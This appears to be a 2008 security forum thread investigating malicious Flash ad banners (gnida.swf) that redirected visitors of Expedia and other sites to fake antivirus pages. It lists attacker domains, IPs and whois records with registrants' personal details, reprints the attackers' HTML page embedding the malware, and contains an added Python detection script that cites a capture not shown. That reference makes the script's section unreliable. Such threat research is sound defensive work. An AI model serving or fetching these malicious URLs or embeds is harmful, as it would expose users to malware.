e-mail: support@SECUREHOST.COM
address: P.O. Box CB-13862, 00000,
address: CB13862 - Nassau - NP
country: BS
phone: +1 242 5028700
created: 20060127
changed: 20061006

% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.
Kimberly

www.expedia.com


This weekend we got some echoes about a malicious advertising banner on www.expedia.com. The campaign is very restrictive as most of the worldwide countries & continents are excluded. While visiting www.expedia.com, one advertising banner caught my attention though; the flash file was again protected / obfuscated using SWF Encrypt 4.x as seen below.
Thanks fly out to Cretemonster for confirming & checking out the advert since my geographic location is on the ban list.
CODE
Frame 44 (387 bytes on wire, 387 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1042 (1042), Dst Port: http (80), Seq: 1, Ack: 1, Len: 333
Hypertext Transfer Protocol
    GET /statsa.php?u=1200655836&campaign=pygmalioni HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://media.expedia.com/ads/FXSound/728x90.swf\r\n
    x-flash-version: 9,0,115,0\r\n
    Accept-Encoding: gzip, deflate\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: media.expedia.com/ads/FXSound/728x90.swf
Campaign: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni

If someone does experience those SWF hijacks / redirects on other websites, don't hesitate to PM me about it. This needs to be stopped!
Kimberly
A search did reveal the existence of quite a few new banners / redirects over the last 48h. We all need your help because those banners target specific countries and block others. Below is a partial list of reported redirects on forums. If you know which banners are causing the redirects below or if you did experience such fake alerts, please contact me or Sandi.

When an advertising banner is found or when new campaigns pop up, I'll update this topic.

quinquecahue.com/swf/gnida.swf?campaign=tautonymus&u=1201174352
  • Reported at www.webzdarma.cz forums.
  • Allowed Country Codes - States / Cities - IP Ranges
    CZ, UA
  • Banned Country Codes - States / Cities - IP Ranges
    89.250.0.0-89.250.255.255
    prague

CODE
Frame 387 (413 bytes on wire, 413 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1190 (1190), Dst Port: http (80), Seq: 1, Ack: 1, Len: 359
Hypertext Transfer Protocol
    GET /statsa.php?u=1201174352&campaign=tautonymus HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.wz.cz/bannery/firstchoice/firstchli.swf?clickthru=http://www.firstchoice.co.uk/?ref=A0991\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n
Banner: i.wz.cz/bannery/firstchoice/firstchli.swf
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atliverish&U=1200328388
  • Reported at eforum.idg.se.
  • Banned Country Code - States / Cities - IP Ranges
    85.18.0.0-85.18.255.255
    1.255.0.0-1.255.255.255
    7.3.0.0-7.3.255.255
    italy
    california, ohio
______________________________

quinquecahue.com/swf/gnida.swf?campaign=myrakehell&u=1200937882
  • Reported at trojaner-board.de and forum.chip.de
  • Allowed Country Codes - States / Cities - IP Ranges
    DE, AT, UA
  • Banned Country Code - City - IP
    88.198.0.0-88.198.255.255
    217.6.0.0-217.6.255.255
    dortmund, radibor, berlin
Banner was reported to be present at onlinetvrecorder.com in the downloads section (which needs membership). According to the forum moderator the banner has been removed...
______________________________

quinquecahue.com/swf/gnida.swf?campaign=teachingor&u=1200504042
  • Reported at www.index.hr
  • Banned Country Code - States / Cities - IP Ranges
    70.84.0.0-70.84.255.255
    70.85.0.0-70.85.255.255
    209.85.0.0-209.85.255.255
    in, il
    texas, california, newyork
    dallas, mountainview, newyork
______________________________

quinquecahue.com/swf/gnida.swf?campaign=ifsequitur&u=1200654870
  • Reported at www.bridicum.com (CSIS Security Group).
  • Banned Country Codes - States / Cities - IP Ranges
    195.47.0.0-195.47.255.255
    84.16.255.255
    copenhagen
______________________________

traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699
  • Reported at forum.zeusnews.com - forum.ingegneri.info.
  • Banned Country Codes - States / Cities - IP Ranges
    217.12.0.0-217.12.255.255 (Yahoo Europe)
    216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
    66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
    UK
    california
    milano, milan, london, dublin, barcelona
In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
______________________________

03/02/2008

mysurvey4u.com/swf/gnida.swf?campaign=me9ntthe&u=1201951156171
  • Reported at forums.myspace.com/p/3747055/37526266.aspx?fuseaction=forums.viewpost
  • www.myspace.com IP :
    216.178.39.14
    216.178.38.130
    216.178.39.16
    216.178.39.15
    216.178.39.74
    216.178.39.12
    216.178.39.11
    216.178.39.13
    216.178.38.131
    216.178.38.129
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atticismus&u=1201712577
  • Reported at www.hispamp3.com/foros
______________________________

quinquecahue.com/statsg.php?u=1200592645&campaign=ofquixotic
  • Reported at www.gaiaonline.com/forum/questions-assistance/ad-banner-infected-with-gnida-swf-trojan/t.37232985/
  • The IP address of gaiaonline.com is 72.5.72.7, so 72.5.0.0-72.5.255.255 will be in the banned list.
______________________________
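The Rhapsody, Expedia and webzdarma captures in the posts above all share one shape: a GET to statsa.php (or statsg.php) on the hosting domain, a campaign parameter, an x-flash-version header, and a Referer that names the banner SWF on the publisher's ad server. That is enough to triage proxy logs or captures for the same pattern. The following Python is an added example, not code from the thread or from Kimberly; the first sample request is retyped from the Rhapsody capture above (Wireshark frame lines dropped), while the benign request and www.example.com are constructed for contrast.

```python
import posixpath
from urllib.parse import parse_qs, urlsplit

# Script names the tracking requests in this thread are sent to; matched on the
# basename so the same script in a different folder still triggers.
STATS_SCRIPTS = {"statsa.php", "statsg.php"}

# Constructed sample: the Rhapsody request from the capture above, retyped as a
# plain HTTP/1.1 request without the Wireshark frame/IP/TCP summary lines.
SAMPLE_REQUEST = (
    "GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?"
    "clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n"
    "x-flash-version: 9,0,47,0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: newbieadguide.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request: an ordinary page load on a made-up host.
BENIGN_REQUEST = (
    "GET /news/index.html HTTP/1.1\r\n"
    "Referer: http://www.example.com/\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into method, target and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def triage(raw):
    """Extract host, script, campaign and referring banner; flag the gnida.swf beacon shape."""
    method, target, headers = parse_request(raw)
    path, _, query = target.partition("?")
    # Query keys are lower-cased: the thread shows both 'u=' and 'U='.
    params = {k.lower(): v[0] for k, v in parse_qs(query).items()}
    ref = urlsplit(headers.get("referer", ""))
    banner = ref.netloc + ref.path if ref.netloc else ""
    # The banner's own clickTag survives in the Referer query; it identifies the ad creative.
    click_tag = {k.lower(): v[0] for k, v in parse_qs(ref.query).items()}.get("clicktag", "")

    flagged = (
        method == "GET"
        and posixpath.basename(path) in STATS_SCRIPTS
        and "campaign" in params
        and banner.lower().endswith(".swf")
        and "x-flash-version" in headers
    )
    return {
        "host": headers.get("host", ""),
        "script": posixpath.basename(path),
        "campaign": params.get("campaign", ""),
        "u": params.get("u", ""),
        "banner": banner,
        "click_tag": click_tag,
        "flagged": flagged,
    }


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        result = triage(raw)
        print(name, "FLAGGED" if result["flagged"] else "ok", result["host"], result["banner"], result["campaign"])
```

The flagged record gives exactly the two lines Kimberly writes under each capture (Banner and Campaign) plus the hosting domain to block; feeding the same routine a day's proxy log is a quick way to find which publisher served the banner to a user who reports a redirect.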
Kimberly

IP Resume


190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

190.15.73.254 - blessedads.com
______________________________

194.110.67.22 - mysurvey4u.com
194.110.67.25 - workhomecenter.com
194.110.67.19 - casinoaceking.com
194.110.67.22 - getfreecar.com
______________________________

84.243.252.94 - traffalo.com
______________________________

Changed.

content.onerateld.com - sec.storageguardsoft.com

66.244.254.11
66.244.254.201
66.244.254.239
85.17.4.101
QUOTE
Network Whois record
Queried whois.arin.net with "66.244.254.11"...

OrgName: Big Pipe Inc.
OrgID: BGPP
Address: Suite 400
Address: 630 - 3rd Ave. SW
City: Calgary
StateProv: AB
PostalCode: T2P-4L4
Country: CA

ReferralServer: rwhois://204.209.209.80:4321

NetRange: 66.244.192.0 - 66.244.255.255
CIDR: 66.244.192.0/18
NetName: BIGPIPE-2
NetHandle: NET-66-244-192-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.BIGPIPEINC.COM
NameServer: DNS2.BIGPIPEINC.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-03-14
Updated: 2002-05-21

RTechHandle: ZB106-ARIN
RTechName: Big Pipe Inc
RTechPhone: +1-403-750-7428
RTechEmail: ipadmin_bigpipe@bigpipeinc.com

OrgAbuseHandle: BPA15-ARIN
OrgAbuseName: Shaw Business Solutions - Abuse
OrgAbusePhone: +1-866-244-7474
OrgAbuseEmail: abuse@shawbusinesssolutions.ca

OrgTechHandle: ZI94-ARIN
OrgTechName: Shaw Business Solutions
OrgTechPhone: +1-403-750-7428
OrgTechEmail: ipadmin@shawbusinesssolutions.ca

# ARIN WHOIS database, last updated 2008-02-03 19:03
# Enter ? for additional hints on searching ARIN's WHOIS database.

QUOTE
Network Whois record
Queried whois.ripe.net with "-B 85.17.4.101"...

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '85.17.4.0 - 85.17.4.255'

inetnum: 85.17.4.0 - 85.17.4.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050320
changed: ripe@ocom.com 20060608
source: RIPE

person: RIP Mean
address: P.O. Box 93054
address: 1090BB AMSTERDAM
address: Netherlands
phone: +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox: abuse@leaseweb.com
e-mail: ripe@ocom.com
nic-hdl: LSW1-RIPE
notify: ripe@ocom.com
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050607
changed: ripe@ocom.com 20060215
changed: ripe@ocom.com 20060608
source: RIPE

% Information related to '85.17.0.0/16AS16265'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050311
changed: ripe@ocom.com 20070610
source: RIPE
______________________________

Failed to resolve hostname.

adtraff.com
burnads.com
netmediagroup.net
uniqads.com
traveltray.com
aheadad.com
______________________________

Update 9 Feb. 2008

They are up again, except aheadad.com

adtraff.com - 84.243.252.84
burnads.com - 84.243.252.85
netmediagroup.net - 84.243.252.91
uniqads.com - 84.243.252.97

traveltray - 194.110.67.23
Kimberly

190.15.64.187 - ? - GET /swf/gnida.swf = ok


Finally got a name for that IP.

entrerrenglonadura.com - 190.15.64.187

IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Created: 2007-11-23
Expires: 2008-11-23
Name Server: NS1.ENTRERRENGLONADURA.COM
Name Server: NS2.ENTRERRENGLONADURA.COM

Error Message
There was an error processing your request.

Domain Name : entrerrenglonadura.com

::Registrant::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Administrative Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Technical Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Name Servers::
ns1.entrerrenglonadura.com
ns2.entrerrenglonadura.com
ns3.entrerrenglonadura.com
ns4.entrerrenglonadura.com

::Dates & Status::
Created Date 2007-11-23 05:03:25 EST
Updated Date 2007-11-23 05:03:25 EST
Valid Date 2008-11-23 05:03:25 EST
Status ACTIVE

human500.com - 71.18.200.75


Another domain came out of the box while doing some research today.

human500.com/bin/tremor/statsg.php

Not the usual folder but let's take a peek at the statsg.php file anyway. Interesting stuff ... we do find our gnida.swf back. So that's another one to blacklist.

CODE
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title></title>
</head>
<body bgcolor="#ffffff">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="200" height="200" id="gnida" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="swf/gnida.swf" />
<param name="menu" value="false" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<embed src="swf/gnida.swf" menu="false" quality="high" bgcolor="#ffffff" width="200" height="200" name="gnida" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</body>
</html>

Website Title: Human500 Project
ICANN Registrar: GODADDY.COM, INC.
Name Server: NS5.IXWEBHOSTING.COM
Name Server: NS6.IXWEBHOSTING.COM
Whois Server: whois.godaddy.com

Server Type: Apache
IP Location - Kentucky - Hopkinsville - Ecommerce Corporation
Created: 2006-08-29
Expires: 2008-08-29
Registrar Status: clientDeleteProhibited
Registrar Status: clientRenewProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited

Whois Record
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: HUMAN500.COM
Created on: 29-Aug-06
Expires on: 30-Aug-08
Last Updated on: 04-Sep-06

Administrative Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Technical Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Domain servers in listed order:
NS5.IXWEBHOSTING.COM
NS6.IXWEBHOSTING.COM

Related domains and mailservers

Extra reading


Inside Rogue Flash Ads, by Dennis Elser and Micha Pekrul, Secure Computing Corporation.
Kimberly
Every day new banners and/or websites show up; we all need your help.

iexplorer-security.org - 84.252.148.219


Server Type: gws
IP Location - Russian Federation - Mc Host.ru
Created: 2008-01-12
Expires: 2010-01-12
Whois Server: whois.pir.org
Dedicated Hosting: iexplorer-security.org is hosted on a dedicated server.

Domain ID:D150624483-LROR
Domain Name:IEXPLORER-SECURITY.ORG
Created On:12-Jan-2008 14:16:26 UTC
Last Updated On:15-Jan-2008 10:31:03 UTC
Expiration Date:12-Jan-2010 14:16:26 UTC
Sponsoring Registrar:EstDomains, Inc. (R1345-LROR)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

Name Server:MANAGEDNS1.ESTBOXES.COM
Name Server:MANAGEDNS2.ESTBOXES.COM
Name Server:MANAGEDNS3.ESTBOXES.COM
Name Server:MANAGEDNS4.ESTBOXES.COM

domains sharing nameservers.

adtds2.promoplexer.com - 217.20.175.74


Domain Name: PROMOPLEXER.COM
Registrar: ESTDOMAINS, INC.
Whois Server: whois.estdomains.com
Referral URL: http://www.estdomains.com
Name Server: NS1.VICI.UA
Name Server: NS2.VICI.UA
Status: ok
Updated Date: 04-jan-2008
Creation Date: 05-nov-2007
Expiration Date: 05-nov-2008

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: http://www.estdomains.com

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin (contact@privacyprotect.org)
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Websites.
  1. Macsweeper.com
hostnames sharing ip with a-records.
  • macsweeper.com
  • ns1.cleanator.com
  • ns1.macsweeper.com
  • www.macsweeper.com
hostnames beginning with adtds2.
  • adtds2.maxconvert.com
domains using this as nameserver.
  • cleanator.com
  • macsweeper.com

Promoplexer.com - 217.20.175.39


Server Type: Apache/2.0.55 (Ubuntu) PHP/5.1.6
IP Address: 217.20.175.39
IP Location - Kyyiv - Kiev - W Net Isp
Created: 2007-11-05
Expires: 2008-11-05
Whois Server: whois.estdomains.com

Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217

Domain Name: PROMOPLEXER.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

Creation Date: 05-Nov-2007
Expiration Date: 05-Nov-2008

Domain servers in listed order:
ns2.vici.ua
ns1.vici.ua

MX alt1.aspmx.l.google.com
64.233.167.27 gsmtp167.google.com
64.233.167.114 gsmtp167-2.google.com

MX alt2.aspmx.l.google.com
209.85.133.27 an-in-f27.google.com
209.85.133.114 an-in-f114.google.com

MX aspmx.l.google.com
66.249.93.27 gsmtp93.google.com
66.249.93.114 gsmtp93-2.google.com

Websites.
  1. Maxconvert.com
  2. Promoplexer.com
hostnames sharing ip with a-records.
  • maxconvert.com
  • usin-39.colo2.kv.wnet.ua
domains sharing mailservers.

domains sharing nameservers.
  • adsraise.com
  • clenator.com
  • kivvisoftware.com
  • maxconvert.com
subdomains.
  • *.promoplexer.com
  • adtds2.promoplexer.com
Kimberly
As mentioned by Sandi, a couple of new banners have caught our eye. We notice a change in the URLs of the redirects.

Before.

[domain]/statsa.php?u=[date/time stamp]&campaign=[campaign name]

Example:
  • quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni
Now.

[domain]/c/index.php?id=[encrypted string]

Examples:
  • station-appraisals.com/c/index.php? id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm
  • staticglobalsources.net/c/index.php? id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm
Let's take the 2 latecomers apart since they reveal some new domains.
  1. station-appraisals.com/c/index.php? id=WjM0VnExOHBjeDMza0dEUDdnUGRoPTEyMDI4MjE3MjYmcG56Y252dGE9dnFyYWd2c2xmYgYNkiDgNmYNkiDgNm
     blessedads.com/?cmpid=identifyso
     antivirusforall.com/?tmn=av5&gai=identifyso&gli=&3&mt_info=5586_5581_4577

  2. staticglobalsources.net/c/index.php? id=m7NkiZnRhRDh6RVRudHpXm7NkiZHJsm7NkiZFUwVEloPTEyMDQwNDcyMzImcG56Y252dGE9bmV0aHpyYWdim7NkiZQYNkiDgNmYNkiDgNm
     waytotheprofit.com/?cmpid=argumentor
New domains.
  1. station-appraisals.com
  2. staticglobalsources.net
  3. waytotheprofit.com

waytotheprofit.com - 76.74.249.30


It's very easy to link this domain to the other players. We notice that blessedads.com and prevedmarketing.com share the same IP with waytotheprofit.com. Colored in orange are the domains which shared nameservers with newbieadguide.com (post #4 - Closest Relationships). As a matter of fact, all were hosted on 190.15.73.254 at that time except deuspayment.com.

Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adnetserver.com
  6. Adredired.com
  7. Adsolutio.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
Domain Name: WAYTOTHEPROFIT.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.WAYTOTHEPROFIT.COM
Name Server: NS2.WAYTOTHEPROFIT.COM
Status: ok
Updated Date: 03-mar-2008
Creation Date: 02-jul-2007
Expiration Date: 02-jul-2009

Domain : waytotheprofit.com

Registrant Contact Information :
Hostmaster Inc.
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE

Admin Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Tech Contact Information :
Donna V. Reed, Donna no_name_inc(at)yahoo.com
Schoolstraat 214
Wambeek, Wambeek 1741
no_name_inc(at)yahoo.com
BE
1-555-555-1234

Billing Contact Information :
Contact is identical to Admin

Name Server: NS2.WAYTOTHEPROFIT.COM - 76.74.249.28
Name Server: NS1.WAYTOTHEPROFIT.COM - 76.74.249.29

hostnames sharing ip with a-records & domains sharing nameservers.
  • ad2profit.com
  • adgurman.com
  • adredired.com
  • adsolutio.com
  • astalaprofit.com
  • bizmarketads.com
  • brandmarketads.com
  • iddqdmarketing.com
  • intervarioclick.com
  • invulnerableads.com
  • luckyadcoin.com
  • luckyadsols.com
  • mythmarketing.com
subdomains.
  • *.waytotheprofit.com
  • mail.waytotheprofit.com
  • ns1.waytotheprofit.com
  • ns2.waytotheprofit.com
QUOTE
Queried whois.arin.net with "!NET-76-74-248-0-1"...

OrgName: ServerBeach
OrgID: SERVER-17
Address: 8500 Vicar Drive 8500, Suite 500
City: San Antonio
StateProv: TX
PostalCode: 78218
Country: US

NetRange: 76.74.248.0 - 76.74.255.255
CIDR: 76.74.248.0/21
NetName: PEER1-SERVERBEACH-08A
NetHandle: NET-76-74-248-0-1
Parent: NET-76-74-128-0-1
NetType: Reallocated
NameServer: NS1.SERVERBEACH.COM
NameServer: NS2.SERVERBEACH.COM
Comment:
RegDate: 2007-12-05
Updated: 2007-12-05

RTechHandle: HOSTM325-ARIN
RTechName: Hostmaster
RTechPhone: +1-210-225-4725
RTechEmail: hostmaster(at)serverbeach.com

OrgAbuseHandle: SNAE-ARIN
OrgAbuseName: Serverbeach Network AUP Enforcement
OrgAbusePhone: +1-604-484-2588
OrgAbuseEmail: abuse(at)serverbeach.com

OrgTechHandle: ZZ4092-ARIN
OrgTechName: ipadmin
OrgTechPhone: +1-210-225-4725
OrgTechEmail: ipadmin(at)serverbeach.com

# ARIN WHOIS database, last updated 2008-03-11 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

ServerBeach ....

station-appraisals.com - 81.93.56.86


Looking at the shared nameservers, it's easy to link station-appraisals.com to the other actors.

Domain Name: STATION-APPRAISALS.COM
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATION-APPRAISALS.COM
Name Server: NS2.STATION-APPRAISALS.COM
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : station-appraisals.com

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

NS1.STATION-APPRAISALS.COM - 202.75.35.72
NS2.STATION-APPRAISALS.COM - 58.65.238.170

hostnames beginning with station-appraisals.
  • station-appraisals.net
domains sharing nameservers.
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • staticglobalsources.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.station-appraisals.com
  • ns1.station-appraisals.com
  • ns2.station-appraisals.com
station-appraisals.net - 81.93.56.87
ns1.station-appraisals.net - 202.75.35.72
ns2.station-appraisals.net - 58.65.238.170

staticglobalsources.net - 81.93.56.85


Domain Name: STATICGLOBALSOURCES.NET
Registrar: COMMUNIGAL COMMUNICATIONS LTD
Whois Server: whois.communigal.net
Referral URL: http://www.galcomm.com
Name Server: NS1.STATICGLOBALSOURCES.NET
Name Server: NS2.STATICGLOBALSOURCES.NET
Status: ok
Updated Date: 04-feb-2008
Creation Date: 01-feb-2008
Expiration Date: 01-feb-2009

Domain : staticglobalsources.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

Admin Contact Information :
Contact is identical to Registrant

Tech Contact Information :
Contact is identical to Admin

Billing Contact Information :
Contact is identical to Admin

Name Server: NS1.STATICGLOBALSOURCES.NET - 202.75.35.72
Name Server: NS2.STATICGLOBALSOURCES.NET - 58.65.238.170

hostnames beginning with staticglobalsources.
  • staticglobalsources.com
domains sharing nameservers
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.net
  • stathisranch.net
  • station-appraisals.com
  • station-appraisals.net
  • statnation.net
  • thetechnorati.com
  • vozemiliogaranon.com
subdomains.
  • *.staticglobalsources.net
  • ns1.staticglobalsources.net
  • ns2.staticglobalsources.net
staticglobalsources.com - 81.93.56.84
ns1.staticglobalsources.com - 202.75.35.72

checking c-net 81.93.56.*


81.93.56.72 aboutstat.com A
81.93.56.74 newstat.net A
81.93.56.75 officialstat.com A
81.93.56.78 stat-diagnostic-imaging.net A
81.93.56.82 stathisranch.net A
81.93.56.84 staticglobalsources.com A
81.93.56.85 staticglobalsources.net A
81.93.56.86 station-appraisals.com A
81.93.56.87 station-appraisals.net A
81.93.56.88 statnation.net A
81.93.56.91 statsla.net A
81.93.56.98 mail.mailindustries.eu PTR A - mailindustries.eu A

Why am I not surprised that all those domains except 81.93.56.98 belong to Serg Moon?

DomainTools reveals the following info:

"Serg Moon" owns about 19 other domains
moon.serg@gmail.com is associated with about 28 domains
Something I learned a long time ago .... "poke around" in the closest ranges.

checking c-net 81.93.55.*

One did catch my eye in that block because it's hosted on a nginx/0.4.13 server.

81.93.55.178 - statworld.net

Registrant Contact Information :
Serg Moon
moon.serg(at)gmail.com
Krokus str.
Amsterdam
NL
NL
31 334558757

81.93.55.176-81.93.55.183 NL-CUST-DENIT-ID-11372 Denit NL Customer with ID 11372

So I think it's safe to presume that all those IPs belong to Serg Moon also. They will have my full attention in the next days.

Denit Internet Services


% Information related to '81.93.48.0 - 81.93.63.255'

inetnum: 81.93.48.0 - 81.93.63.255
org: ORG-DIS2-RIPE
admin-c: DIT8723-RIPE
netname: NL-DENIT-20060508
descr: Denit Internet Services
country: NL
tech-c: DIT8723-RIPE
status: ALLOCATED PA
notify: ripe@denit.nl
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: DENIT-IS-MNT
mnt-routes: DENIT-IS-MNT
changed: hostmaster@ripe.net 20060508
changed: bitbucket@ripe.net 20080125
source: RIPE

organisation: ORG-DIS2-RIPE
org-name: Denit Internet Services
org-type: LIR
address: Denit Internet Services B.V.
Contactweg 131
1014 BJ Amsterdam
NETHERLANDS
phone: +31 20 3372560
